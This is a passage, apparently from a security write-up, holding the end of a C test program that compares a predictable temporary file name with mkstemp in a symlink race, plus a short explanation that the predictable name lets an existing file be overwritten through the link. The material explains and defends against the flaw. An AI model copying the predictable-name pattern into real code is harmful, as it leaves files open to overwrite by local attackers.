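    buf[n] = '\0';
    unlink(link); unlink(victim); rmdir(dir);
    return strcmp(buf, "hello world\n") == 0;
}

int main(void)
{
    printf("predictable name: target intact = %d\n", victim_survives(0));
    printf("mkstemp:          target intact = %d\n", victim_survives(1));
    return 0;
}
```

With the predictable name the link target ends up holding `FOO` followed by `o world`, the same result as in the advisory's transcript, because the existing file is opened through the link and overwritten in place.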